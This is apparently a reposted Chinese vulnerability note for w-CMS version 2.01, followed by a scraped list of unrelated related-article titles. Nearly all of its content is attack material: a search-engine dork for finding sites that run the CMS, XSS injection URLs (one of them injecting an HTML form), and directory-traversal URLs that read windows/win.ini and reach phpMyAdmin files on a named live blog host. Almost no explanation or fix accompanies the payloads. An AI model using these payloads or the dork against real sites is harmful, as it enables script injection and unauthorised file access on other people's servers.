官方网站:http://w-cms.info/
下载地址:http://code.google.com/p/wcms/

关键字: intext:"Powered by w-CMS"
版本:[2.01]

XSS漏洞

http://hellxman.blog.51cto.com/index.php?bid=1&COMMENT=1 "XSS"
http://hellxman.blog.51cto.com/?p=3"XSS"
http://hellxman.blog.51cto.com/?bid=5&p=1"XSS"
 
 
http://hellxman.blog.51cto.com/?p=3<FORM action="Default.asp?PageId=-1" method=POST id=searchFORMname=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH"></FORM>

目录遍历漏洞:

http://hellxman.blog.51cto.com/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://hellxman.blog.51cto.com/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php

转载于:https://blog.51cto.com/hellxman/762626

W-Cms XSS和遍历目录漏洞相关推荐

  1. linux遍历目录漏洞,ubuntu linux 目录遍历漏洞(CVE-2019-14452)

    漏洞描述 目录遍历 在0.9.16之前的Sigil容易受到目录遍历的攻击,允许攻击者通过在提取期间处理不当的ZIP存档条目中的../(点点斜杠)写入任意文件.d S k O 基本信息 CVE编号: C ...

  2. linux遍历目录漏洞,Mutiny 多个目录遍历漏洞(CVE-2013-0136)

    发布日期:2013-05-15 更新日期:2013-06-02 受影响系统: Mutiny Mutiny 5 描述: ----------------------------------------- ...

  3. python如何搜索关键字_Python遍历目录和搜索文件中的关键字

    2012-11-03 wcdj 遗留问题:如何处理中文 #-*- coding: gbk -*- ############ # 20121003 wcdj # FindFilev0.1 # 遍历目录和 ...

  4. 删除文件部分内容 php,php实现遍历目录并删除指定文件中指定内容_php技巧

    现在正坐在安静的寝室里,寒假俨然已经离我而去了--今天发的是我寒假里搞的最后一次学习,之后的时间就一直在看海贼王了. 以前写过一个C语言的遍历目录+复制文件的程序,很长很复杂,现在用PHP一样可以实现 ...

  5. 【优秀课设】基于OpenCV的Python人脸识别、检测、框选(遍历目录下所有照片依次识别 视频随时标注)

    基于OpenCV的Python人脸识别.检测.框选 (遍历目录下所有照片依次识别 视频随时标注) 移步: https://blog.csdn.net/weixin_53403301/article/d ...

  6. php获取文件夹下所有文件名(php遍历目录)

    当我对接小发猫API的时候,需要php获取文件夹下所有文件名,我们有时候需要读取目录里面的内容,在 PHP 有多个函数可以获取文件系统目录信息,今天就给大家分享 PHP 遍历目录的三种方法. php获 ...

  7. 【优秀课设】基于OpenCV-Python的树莓派人脸识别及89C52单片机控制系统设计(指定照片进行识别、遍历目录下所有照片依次识别)

    基于OpenCV-Python的树莓派人脸识别及89C52单片机控制系统设计 (指定照片进行识别) 参照之前的文章所改进 增加视频随时标注功能 https://blog.csdn.net/weixin ...

  8. linux c 遍历目录 及 目录下文件

    目录 递归实现 非递归实现 我们知道,许多操作系统中的目录结构都是使用树结构. 使用递归的方法定义树是比较容易的.一棵树地一些节点的集合. 这个集合可以为空,若非空,则树由树根和0个或者多个非空的子树 ...

  9. window和linux下遍历目录的比较

    window下,遍历目录主要是用FindFirstFile和FindNextFile,而linux下是用opendir和readdir实现 void scanFile(char *szDir) {WI ...

最新文章

  1. spring cloud互联网分布式微服务云平台规划分析--服务统一配置中心
  2. 他们创造了编程语言,他们是这个时代伟大的父亲
  3. Marshal类的简单使用
  4. 电脑壁纸知乎_电脑壁纸(个人向
  5. boost::mp11::mp_set_intersection相关用法的测试程序
  6. TypeScript class 的访问控制
  7. CRM端 equipment hierarchy change成功的标志
  8. ubuntu 14.04 java_Ubuntu14.04下配置Java环境
  9. java读取pem格式私钥_openssl生成RSA格式及pkcs1与pkcs8格式互相转换
  10. 演练 获取所有电视频道 FullChannels.xml c# 1614256914
  11. 企业如何降低应用安全风险?
  12. tl wdr5660虚拟服务器,TP-Link TL-WDR5660路由器怎么设置?
  13. spring @Transactional注解的使用和失效场景
  14. iconv linux 开源代码,每天一个 Linux 命令(123):iconv 命令
  15. Sqlmap使用教程【超全】
  16. walking机器人仿真教程-激光导航-仿真单点导航
  17. 大学四年的学习规划目标
  18. MacOS上符号执行模块angr和z3-solver模块的安装
  19. html的size属性,HTML size属性用法及代码示例
  20. 游戏程序员的核心竞争力是什么?

热门文章

  1. JAVA b2b2c多用户商城系统源码-服务发现服务端EurekaServer微服务
  2. lk部分没有msm8937相关目录原因(指向msm8952)
  3. 如何在Angular 2项目中使用Bootstrap css库
  4. 移动端web页面自适应和rem
  5. shell if condition
  6. Java float型数据判断是否相等
  7. 配置用户组策略环回处理模式
  8. 剑指 Offer II 117. 相似的字符串
  9. 龙族幻想最新东京机器人位置_龙族幻想:最强“人形兵器”格斗家降临卡塞尔学院...
  10. 数据结构与算法之-----图(搜索算法)